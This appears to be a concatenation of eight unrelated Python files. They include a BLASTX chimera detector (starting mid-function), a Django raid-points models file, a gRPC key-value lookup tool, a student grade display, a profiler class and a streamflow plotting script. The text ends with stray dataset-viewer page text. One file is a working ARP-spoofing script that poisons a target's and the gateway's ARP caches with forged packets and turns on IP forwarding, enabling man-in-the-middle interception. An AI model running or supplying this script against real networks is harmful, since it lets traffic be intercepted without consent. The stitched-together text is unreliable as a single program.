outfile1.write(outhsp[0]+" "+str(int(start))+" "+str(int(end))+" trans-self\n")
#write the blastx block to a .info file for visual checking
for i in pos:
outfile2.write(str(i)+"\t")
outfile2.write("\n")
for i in neg:
outfile2.write(str(i)+"\t")
outfile2.write("\n")
return False
else:
return True #has both direction but not separate
if __name__ == "__main__":
if len(sys.argv) != 3:
print "usage: python detect_chimera_from_blastx.py blastx_output output_dir"
sys.exit()
blastx_output = sys.argv[1]
DIR = sys.argv[2]
if DIR == ".": DIR = os.getcwd()
if os.path.isabs(DIR) == False: DIR = os.path.abspath(DIR)
if DIR[-1] != "/": DIR += "/"
path_blastx, file_blastx = os.path.split(blastx_output) #splits the path from the file name
blastx_name = str(file_blastx)
blastx_base_name = blastx_name.split( "." )
infile = open(blastx_output,"rU")
outfile1 = open(DIR+blastx_base_name[0]+".cut","w")
outfile2 = open(DIR+blastx_base_name[0]+".info","w")
last_query = ""
for line in infile:
if len(line) < 3: continue #ignore empty lines
hsp = line.strip().split("\t")
for i in [5,10,11]: hsp[i] = float(hsp[i])
if hsp[5] < PIDENT_CUTOFF or qcov(hsp) < LENGTH_CUTOFF:
continue #ignore low similarity or short HSPs
query,hit = hsp[0],hsp[2]
if last_query == "": #at the beginning of a file
hit_block = [hsp] #store all HSPs of the same query and same hit
query_block = [hsp] #store all HSPs from the same query
good_seq = True #False if chimera is detected
elif query == last_query: #continue with the same query
query_block.append(hsp)
if good_seq: #only check if no chimera has been detected
if hit == last_hit:
hit_block.append(hsp)
else: #send off the hit_block
good_seq = check_block(hit_block,False)
hit_block = [hsp]
else: #starting a new query
if good_seq: #haven't found self chimera
good_seq = check_block(hit_block,False) #check the last hit block
if good_seq: #haven't found self chimera
good_seq = check_block(query_block,True) #look for multi-chimera
query_block,hit_block = [hsp],[hsp]
good_seq = True
#keep track of the last line processed
last_query,last_hit = query,hit
if good_seq: #haven't found self chimera
good_seq = check_block(hit_block,False) #check the last hit block
if good_seq: #haven't found self chimera
good_seq = check_block(query_block,True) #check the last query block
infile.close()
outfile1.close()
outfile2.close() |
import sqlite3
conn = sqlite3.connect('data.sqlite')
c = conn.cursor()
#c.execute("CREATE TABLE login(id integer primary key autoincrement not null,user text not null, PASS text not null)")
#c.execute("INSERT INTO login (user,pass)VALUES ('jerin','pass')")
c.execute("select * from data1 ")
l=c.fetchall()
print(l)
conn.commit()
conn.close()
|
# -*- coding: utf-8 -*-
import string
import logging
from django.db import models
from django.db.models import Sum, Count, Avg
from dkp.utils import raid_period, calculate_percent, cached_method, cached_property, QuerySetManager
DATE_FORMAT = '%d.%m.%y'
TIME_FORMAT = '%H:%M'
logger = logging.getLogger('dkp')
class Config(models.Model):
name = models.CharField(max_length=100)
value = models.CharField(max_length=100)
def __unicode__(self):
return self.name
class Pool(models.Model):
name = models.CharField(max_length=100, unique=True)
sort = models.IntegerField()
def __unicode__(self):
return self.name
class Tier(models.Model):
name = models.CharField(max_length=100)
pool = models.ForeignKey(Pool)
sort = models.IntegerField()
class Meta:
"""
Samannimisiä tier vain eri pooleissa.
Ei samaa järjestys numeroa pool sisällä monelle tier.
"""
unique_together = (('pool', 'name'), ('pool', 'sort'),)
def __unicode__(self):
return u'{}: {}'.format(self.pool.name, self.name)
@cached_method('Tier_{id}_sum_{period}')
def sum(self, period=30):
base = Raid.objects.filter(event__tier=self.id)
if period > 0:
base = base.filter(time__gte=raid_period(period))
return base.aggregate(Sum('value'))['value__sum'] or 0
@cached_method('Tier_{id}_count_{period}')
def count(self, period=30):
base = Raid.objects.filter(event__tier=self.id)
if period > 0:
base = base.filter(time__gte=raid_period(period))
return base.count()
class Event(models.Model):
name = models.CharField(max_length=100)
tier = models.ForeignKey(Tier)
attendance = models.BooleanField(default=True)
class Meta:
"""
Ei samannimisiä event tier sisällä
"""
unique_together = ('tier', 'name')
def __unicode__(self):
return u'{}'.format(self.name)
@models.permalink
def get_absolute_url(self):
return ('view_event', (), {'tier': self.tier.id, 'eventid': self.id})
class GameRace(models.Model):
name = models.CharField(max_length=100, unique=True)
def __unicode__(self):
return self.name
class GameClass(models.Model):
name = models.CharField(max_length=100, unique=True)
css = models.CharField(max_length=100)
def __unicode__(self):
return self.name
def save(self):
self.css = string.lower(self.name).replace(' ', '')
super(GameClass, self).save()
class Rank(models.Model):
name = models.CharField(max_length=100, unique=True)
def __unicode__(self):
return self.name
class Member(models.Model):
name = models.CharField(max_length=100, unique=True)
note = models.TextField(blank=True)
game_race = models.ForeignKey(GameRace)
game_class = models.ForeignKey(GameClass)
rank = models.ForeignKey(Rank)
def __unicode__(self):
return self.name
class MemberDKP(models.Model):
"""
XXX: pre_delete: poista attendancet, itemit, adjustmentit.
virhe jos näiten poistamisen jälkeen valuet != 0?
"""
member = models.ForeignKey(Member)
tier = models.ForeignKey(Tier)
def clean_tier(self):
"""
MemberDKP tieriä ei voida muuttaa. Hajoittaisin raid attendancet yms.
"""
return self.instance.tier
class Meta:
"""
Memberillä korkeintaan yksi MemberDKP per tier
"""
unique_together = ('member', 'tier')
# Päivittyvät automaattisesti
value_earned = models.IntegerField(default=0)
value_spent = models.IntegerField(default=0)
value_adjustment = models.IntegerField(default=0)
value_lastraid = models.DateTimeField(null=True, auto_now_add=False)
objects = QuerySetManager()
class QuerySet(models.query.QuerySet):
def active_members(self):
return self.exclude(member__rank__name='Out')
def tier(self, tier):
return self.filter(tier=tier)
def game_class(self, var):
return self.filter(member__game_class=var)
def standings(self):
self = self.extra(
select={'sum30': """
SELECT COALESCE(SUM(dkp_raid.value), 0) AS sum30
FROM dkp_raid, dkp_raid_attendees
WHERE dkp_raid.id = dkp_raid_attendees.raid_id
AND dkp_raid_attendees.memberdkp_id = dkp_memberdkp.id
AND dkp_raid.time >= %s"""},
select_params=(raid_period(30).isoformat(), ))
return self
def update_dkp(self, tier=-1):
if tier >= 0:
self = self.filter(tier=tier)
for memberdkp in self:
memberdkp.update_earned()
memberdkp.update_spent()
memberdkp.update_adjustment()
memberdkp.update_lastraid()
def __unicode__(self):
return u'{}'.format(self.name)
@models.permalink
def get_absolute_url(self):
return ('view_member', (), {'tier': self.tier.id, 'memberid': self.member.id})
@property
def name(self):
"""Admin näkymää varten"""
return self.member.name
@property
def calculate_earned(self):
return self.raid_set.aggregate(Sum('value'))['value__sum'] or 0
def update_earned(self):
self.value_earned = self.calculate_earned
self.save()
def correct_earned(self):
return self.value_earned == self.calculate_earned
@property
def calculate_spent(self):
return self.loot_set.aggregate(Sum('value'))['value__sum'] or 0
def update_spent(self):
self.value_spent = self.calculate_spent
self.save()
def correct_spent(self):
return self.value_spent == self.calculate_spent
@property
def calculate_adjustment(self):
return self.adjustment_set.aggregate(Sum('value'))['value__sum'] or 0
def update_adjustment(self):
self.value_adjustment = self.calculate_adjustment
self.save()
@property
def correct_adjustment(self):
return self.value_adjustment == self.calculate_adjustment
def update_lastraid(self):
try:
self.value_lastraid = self.raid_set.latest('time').time
except:
self.value_lastraid = None
self.save()
@property
def current(self):
return self.value_earned - self.value_spent + self.value_adjustment
@cached_method('MemberDKP_{id}_sum_{period}')
def sum(self, period=-1):
r = self.raid_set
if period > 0:
r = r.filter(time__gte=raid_period(period))
return r.aggregate(Sum('value'))['value__sum'] or 0
@cached_method('MemberDKP_{id}_count_{period}')
def count(self, period=-1):
r = self.raid_set
if period > 0:
r = r.filter(time__gte=raid_period(period))
return r.count()
def sumPercent(self, period=-1):
return calculate_percent(self.sum(period=period), self.tier.sum(period=period))
def countPercent(self, period=-1):
return calculate_percent(self.count(period=period), self.tier.count(period=period))
@cached_property
def percent30(self):
try:
# Standingsejä näytettäessä hyödynnetään arvoa subquerystä
return calculate_percent(self.sum30, self.tier.sum(period=30))
except:
# Muuten joka memberdkplle suoritetaan uusi query
return self.sumPercent(period=30)
@property
def good_activity(self):
return self.percent30 >= 0.6
@property
def multiplier(self):
return self.percent30 if self.good_activity else 0
@property
def activity(self):
return int(100 * self.percent30)
@property
def usable(self):
return int(self.multiplier * self.current)
class Raid(models.Model):
event = models.ForeignKey(Event)
time = models.DateTimeField()
date = models.DateField()
note = models.TextField(blank=True)
value = models.IntegerField()
attendees = models.ManyToManyField(MemberDKP)
objects = QuerySetManager()
class QuerySet(models.query.QuerySet):
def with_attendees_counts(self):
return self.annotate(attendees_count_a=Count('attendees'))
@property
def average_value(self):
return int(self.aggregate(Avg('value'))['value__avg']) or 0
@property
def average_attendees(self):
return int(self.aggregate(Avg('attendees_count_a'))['attendees_count_a__avg']) or 0
def __unicode__(self):
return u'{}: {}'.format(self.event.name, self.time.strftime(DATE_FORMAT + ' ' + TIME_FORMAT))
@models.permalink
def get_absolute_url(self):
return ('view_raid', (), {'tier': self.event.tier.id, 'raidid': self.id})
def tier(self):
return self.event.tier.name
def name(self):
return self.event.name
def save(self, **kwargs):
self.date = self.time
super(Raid, self).save(**kwargs)
@property
def attendees_count(self):
try:
return self.attendees_count_a
except:
return MemberDKP.objects.filter(raid=self.id).count()
QUALITY_CHOICES = ((0, 'Poor'), (1, 'Common'), (2, 'Uncommon'), (3, 'Rare'), (4, 'Epic'), (5, 'Legendary'), (6, 'Artifact'), (7, 'Heirloom'),)
SOURCE_CHOICES = ((0, 'Normal'), (1, 'Heroic'), (2, 'Raidfinder'),)
class Item(models.Model):
"""
Pk toimii samalla itemid.
"""
name = models.CharField(max_length=100)
quality = models.SmallIntegerField(default=0, choices=QUALITY_CHOICES)
icon = models.CharField(max_length=100, null=True)
source = models.SmallIntegerField(default=0, choices=SOURCE_CHOICES)
objects = QuerySetManager()
class QuerySet(models.query.QuerySet):
def with_drop_counts(self):
return self.annotate(drop_count=Count('loot'))
def with_average_loot_values(self):
return self.annotate(avg_value=Avg('loot__value'))
@property
def average_value(self):
"""
Laskee itemien average valuen keskiarvon.
Eli vaatii with_average_loot_value käyttöä
"""
return int(self.aggregate(Avg('avg_value'))['avg_value__avg']) or 0
def __unicode__(self):
return u'{}'.format(self.name)
LOOT_CHOICES = ((0, 'Looted'), (1, 'Disenchanted'))
class Loot(models.Model):
raid = models.ForeignKey(Raid)
memberdkp = models.ForeignKey(MemberDKP, null=True, blank=True)
status = models.SmallIntegerField(default=0, choices=LOOT_CHOICES)
item = models.ForeignKey(Item)
value = models.IntegerField()
objects = QuerySetManager()
class QuerySet(models.query.QuerySet):
@property
def average_value(self):
return int(self.aggregate(Avg('value'))['value__avg']) or 0
def __unicode__(self):
return u'{}'.format(self.item.name)
@models.permalink
def get_absolute_url(self):
return ('view_item', (), {'tier': self.raid.event.tier.id, 'itemid': self.item.id})
@property
def name(self):
return self.item.name
class Adjustment(models.Model):
name = models.CharField(max_length=200)
memberdkp = models.ForeignKey(MemberDKP)
time = models.DateTimeField()
value = models.IntegerField()
def __unicode__(self):
return self.name
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""The kv_seek command allows to query the turbo-geth/silkworm KV gRPC."""
import argparse
import context # pylint: disable=unused-import
from silksnake.remote import kv_utils
from silksnake.remote.kv_remote import DEFAULT_TARGET
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('bucket', help='the bucket tag as string')
parser.add_argument('seek_key', help='the seek key as hex string without leading 0x')
parser.add_argument('-t', '--target', default=DEFAULT_TARGET, help='the server location as string <address>:<port>')
args = parser.parse_args()
print('REQ bucket:', args.bucket, 'seek_key:', args.seek_key)
key, value = kv_utils.kv_seek(args.bucket, bytes.fromhex(args.seek_key), args.target)
print('RSP key:', key.hex(), 'value:', value.hex())
|
# --------------------------------------------------------------------------------------------------------------------------------------
print("\n")
print(" ✦ __✦__✦__✦__✦__✦__✦__✦__✦__✦__✦__✦__✦__✦__✦__✦__✦__✦__✦__✦__✦__✦__ ✦")
print(" Welcome to the Student Progression Program - Alternative Staff Version ")
print(" ✦ __✦__✦__✦__✦__✦__✦__✦__✦__✦__✦__✦__✦__✦__✦__✦__✦__✦__✦__✦__✦__✦__ ✦")
# --------------------------------------------------------------------------------------------------------------------------------------
print("\n")
# --------------------------------------------------------------------------------------------------------------------------------------
l_for_display = ["Pass=120 Defer=00 Fail=00 ", "Pass=100 Defer=20 Fail=0 ", "Pass=100 Defer=0 Fail=20 ",
"Pass =80 Defer= 20 Fail =20 ", "Pass=60 Defer=40 Fail=20 ", "Pass=40 Defer=40 Fail=40",
"Pass=20 Defer=40 Fail=60 ", "Pass=20 Defer=20 Fail=80 ", "Pass=20 Defer=00 Fail=100",
"Pass=00 Defer=00 Fail=120"]
tup_display = ('Progress', 'Progress – module trailer', 'Do not Progress – module retriever', 'Exclude')
# 0 1 2 3
print("\n")
print(l_for_display[0]) # 1
print(tup_display[0])
print("----------------------------")
print("\n")
print(l_for_display[1]) # 2
print(tup_display[1])
print("----------------------------")
print("\n")
print(l_for_display[2]) # 3
print(tup_display[1])
print("----------------------------")
print("\n")
print(l_for_display[3]) # 4
print(tup_display[2])
print("----------------------------")
print("\n")
print(l_for_display[4]) # 5
print(tup_display[2])
print("----------------------------")
print("\n")
print(l_for_display[5]) # 6
print(tup_display[2])
print("----------------------------")
print("\n")
print(l_for_display[6]) # 7
print(tup_display[2])
print("----------------------------")
print("\n")
print(l_for_display[7]) # 8
print(tup_display[3])
print("----------------------------")
print("\n")
print(l_for_display[8]) # 9
print(tup_display[3])
print("----------------------------")
print("\n")
print(l_for_display[9]) # 10
print(tup_display[3])
print("----------------------------")
|
#!/usr/bin/env python3
import scapy.all as net
import sys, os, time, math, threading
sys.path.append(os.path.join(os.path.dirname(__file__), ".."))
import get_machines
VERBOSITY = 0
print("Finding network devices...")
machines = get_machines.search(ps4=True)
print("Enabling IP Forward...")
with open("/proc/sys/net/ipv4/ip_forward", "w") as f:
f.write("1")
try:
print("Altering ARP...")
while True:
#hwdst is the actual recepient of the ARP packet, src is where the requests want to go, dst is where they end up
net.send(net.ARP(op="who-has", hwdst=machines["target"].mac, pdst=machines["target"].ip, psrc=machines["gateway"].ip), verbose=VERBOSITY)
net.send(net.ARP(op="who-has", hwdst=machines["gateway"].mac, pdst=machines["gateway"].ip, psrc=machines["target"].ip), verbose=VERBOSITY)
time.sleep(2) #typically kept in the ARP cache for 60s
except KeyboardInterrupt:
pass
print("Restoring ARP...")
net.send(net.ARP(op="who-has", hwdst=machines["target"].mac, pdst=machines["target"].ip, hwsrc=machines["gateway"].mac, psrc=machines["gateway"].ip), verbose=VERBOSITY)
net.send(net.ARP(op="who-has", hwdst=machines["gateway"].mac, pdst=machines["gateway"].ip, hwsrc=machines["target"].mac, psrc=machines["target"].ip), verbose=VERBOSITY)
print("Disabling IP Forward...")
with open("/proc/sys/net/ipv4/ip_forward", "w") as f:
f.write("0")
|
import prof
class MethodInfo(object):
def __init__(self, method):
self.method = method
self.method_instances = []
def invoke(self, *args, **kwargs):
return prof.METHOD_INSTANCE_STACK[-1].invoke_child(self, *args, **kwargs)
def __str__(self, *args, **kwargs):
return "{0}::{1}".format(self.method.__module__, self.method.__name__) |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
TO RUN: script from command line: python SummarizeData.py filename # not including file extension
Created on Fri Mar 20 16:30:24 2020
Assignment 6
Run this script once to open a user-defined data file, generate a pdf summary of figures,
and a second time to do the same with a user-defined different data file.
@author: wagne216
"""
# modules:
import numpy as n
import matplotlib.pyplot as m
import pylab as p
import sys as s # to get command line arg
# see if the arguments are working:
print('Working with file named ',s.argv[1]+'.txt')
# 1.) OPEN
# come back to later: add command-line cmd to ask user input file_title
# 1 header line # one var per column # name col's based on headers
#file_title=('Tippecanoe_River_at_Ora.Annual_Metrics') # test with known filename
file_title = s.argv[1] # accepts argument in command line for title
in_file = file_title + '.txt'
yr,avg,mx,mn,sdev,tqmean,RB = \
n.genfromtxt(in_file, \
unpack=True, skip_header=1)
#%% 2.) PLOT
# Create a new figure of size 8x6 points, using 100 dots per inch
m.figure(figsize=(9,15), dpi=50) # both of these affects size, quality
# ^ create fig size proportions 1,>=1.5 to avoid title, xlabel overlap.
# PLOT 1: mean, med, max streamflow (cfs) (lines)
m.subplot(3,1,1)
m.plot(yr, mn, color="blue", linewidth=2.5, linestyle="-", label="min")
m.plot(yr, mx, color="red", linewidth=2.5, linestyle="-", label="max")
m.plot(yr, avg, color="black", linewidth=2.5, linestyle="-", label="mean")
# add legend:
m.legend(loc='best', frameon=False)
# fix ticks/bounds:
m.ylim(0,1.05*mx.max())
m.xlim(yr.min(),yr.max())
# labels:
m.title('Annual Values for Streamflow')
m.xlabel('Year')
m.ylabel('Streamflow (cfs)')
#%% PLOT 2: Tqmean % (symbols)
m.subplot(3,1,2)
m.plot(yr, tqmean*100, color='#32a850',marker='4',linestyle='none',label="tq")
# fix ticks/bounds:
m.ylim(0,1.05*100*tqmean.max())
m.xlim(yr.min(),yr.max())
# labels:
m.title('Annual Values for % Tqmean')
m.xlabel('Year')
m.ylabel('Tqmean (%)')
#%% PLOT 3: R-B Index (ratio) (bar)
m.subplot(3,1,3)
num = len(yr) # # bars
m.bar(yr,RB,color='#cbf525',edgecolor='#f525dd',width=1)
# fix ticks/bounds:
m.ylim(0,1.05*RB.max())
m.xlim(yr.min(),yr.max())
# labels:
m.title('Annual Values for R-B Index')
m.xlabel('Year')
m.ylabel('R-B Index (ratio)')
# %%3.) WRITE TO PDF
p.savefig(file_title+'.pdf') # use original filename input by user as the title
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.